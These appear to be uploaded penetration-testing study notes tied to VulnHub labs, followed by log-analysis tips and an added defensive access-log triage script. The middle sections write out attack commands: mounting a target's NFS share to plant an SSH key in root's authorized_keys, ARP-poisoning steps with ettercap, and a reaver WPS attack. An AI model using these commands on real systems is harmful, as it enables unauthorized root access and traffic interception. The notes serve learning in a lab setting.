
Security Testing Notes - LINUX

This document provides an overview of commands and tools used in penetration testing and hacking. It discusses Linux directory structures and user privileges, networking commands like ping and nmap, vulnerability scanning tools like Nessus, methods for accessing remote systems like SSH key generation, wireless hacking tools like Reaver, and analyzing log files on Linux and Windows systems.

Uploaded by

hairudin

vulnhub: https://www.vulnhub.com/

C:\ = / --> root

/ -
1. bin - any program you can run
2. sbin - any program with root privilege
3. opt - config file
4. etc - config
5. tmp - temporary data

id = 0 is the most powerful user

clear - to clear
whoami - to check who
id - to check id

ping -c 4 172.21.0.34 --> to ping 4 times

*Tenable Nessus can find existing vulnerabilities
*OpenVAS

how to start:

scan the target host
identify entry point

1. nmap 172.21.0.34 (to check all open ports)
2. nmap -A 172.21.0.34 (to find all services)
3. log in as SU
4. netdiscover (to check whether there are other computers on the network)
5. ipconfig
6. nmap -sP 172.21.0.75/23
7. nmap -sU 172.21.1.1 -p 161
8. rpcinfo 172.21.0.34 (to find out which services are currently running)
9. showmount -e 172.21.0.34 (to see which folders are shared)

ssh-key
- create public and private key
#ssh-keygen
- how to check the keys that ssh-keygen has created
#cd /root/.ssh
#ls
- id_rsa (the key) and id_rsa.pub (the padlock)
- to open key
#cat id_rsa.pub
#cat id_rsa
- create a folder
#mkdir /tmp/hack
#mount -t nfs 172.21.0.34:/ /tmp/hack/ (to check symlink)
#df (to check whether it is connected or not)
#cat id_rsa.pub >> /tmp/hack/root/.ssh/authorized_keys (copy the public key to the server)
(the copy or move commands cannot be used)

sudo apt-get update
sudo apt-get upgrade
sudo apt-get install etherape
etherape
nmap -vvv -A <ip address>
nmap -vvv -A 172.21.0.34

arp: address resolution protocol

ettercap -G ; click the accept button
find the three dots - scan for hosts -
MITM menu - ARP poisoning - sniff remote connection
arp -a

bettercap
- net.probe on

bettercap -C

SIEM - centralized (splunk), agent based (wazuh)


SOC - operations
SIC - intelligence
SOAR - security orchestration automation response

logs in Linux:

access log
#file access.log
#wc -l access.log (word count)
#head -n 2 access.log (sample 2 records from the top)
#tail -n 2 access.log (sample 2 records from the bottom)
#cat access.log | cut -d " " -f 1 (extract the data from field 1)
#cat access.log | cut -d " " -f 1 | sort -u (to output only the unique IPs)
#cat access.log | cut -d " " -f 1 | sort -u >> output.txt (save the file as output.txt)
#nl output.txt (adds numbering)

#cat output.txt | head -n 50
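
The access-log steps above, taken one step further for triage: requests per client and 4xx/5xx responses per client. This is an added example, not part of the original notes; the function names and the sample log lines are constructed, and it assumes Common/Combined Log Format.

```shell
#!/bin/sh
# Added example (not from the original notes): triage of a web access log.
# Assumption: Common/Combined Log Format (client IP first, status after the quoted request).

# Constructed sample lines; the addresses are documentation ranges, not real traffic.
make_sample_log() {
cat <<'EOF'
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326
198.51.100.23 - - [10/Oct/2023:13:55:40 +0000] "GET /admin HTTP/1.1" 403 199
198.51.100.23 - - [10/Oct/2023:13:55:41 +0000] "GET /login HTTP/1.1" 401 199
198.51.100.23 - - [10/Oct/2023:13:55:42 +0000] "-" 400 0
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /about.html HTTP/1.1" 200 1500
192.0.2.10 - - [10/Oct/2023:13:57:12 +0000] "GET /missing HTTP/1.1" 404 153
198.51.100.23 - - [10/Oct/2023:13:57:30 +0000] "GET /index.html HTTP/1.1" 200 2326
EOF
}

# unique_ips FILE: the cut | sort pipeline from the notes, one line per client IP.
unique_ips() {
  cut -d " " -f 1 "$1" | sort -u
}

# top_talkers FILE [N]: "count ip" for the N busiest clients (default 10).
top_talkers() {
  cut -d " " -f 1 "$1" | sort | uniq -c | sort -k1,1nr -k2,2 |
    head -n "${2:-10}" | awk '{ print $1, $2 }'
}

# error_counts FILE: "ip total errors", clients with the most 4xx/5xx first.
# Splitting on the double quote keeps the status readable even when the request
# is malformed (a bare "-"), which would shift space-separated field numbers.
error_counts() {
  awk -F'"' '{
      split($1, pre, " ");  ip = pre[1]
      split($3, post, " "); status = post[1]
      total[ip]++
      if (status ~ /^[45][0-9][0-9]$/) err[ip]++
    }
    END { for (ip in total) print ip, total[ip], err[ip] + 0 }' "$1" |
    sort -k3,3nr -k2,2nr -k1,1
}

# Demo on the constructed sample.
log=$(mktemp)
make_sample_log > "$log"
echo "Unique clients:";    unique_ips "$log"
echo "Top talkers:";       top_talkers "$log" 3
echo "Errors per client:"; error_counts "$log"
rm -f "$log"
```

A client with many requests and a high share of 4xx responses is a good first candidate to look up in the geolocation step that follows.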


go to web >> https://app.ipapi.co/bulk/

maxmind

** logs in Windows:

event viewer - security - save event as:
online: upload to https://app.gigasheet.com/

4688: malware
4670: unauthorized access
4672: admin authorization
1006 & 1007: events connected to the antivirus

** to download sample log
https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/4794_DSRM_password_change_t1098.evtx

** type of attack
https://attack.mitre.org
WIRELESS: 802.11 a/b/g/n/ac/6/7
-WPS pin
- reaver in kali linux (reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv)

Hak5 (https://shop.hak5.org/)
- WiFi Pineapple

https://www.ekahau.com/
https://ekahau-heatmapper.software.informer.com/1.1/ (to identify signal strength)
https://www.netspotapp.com/
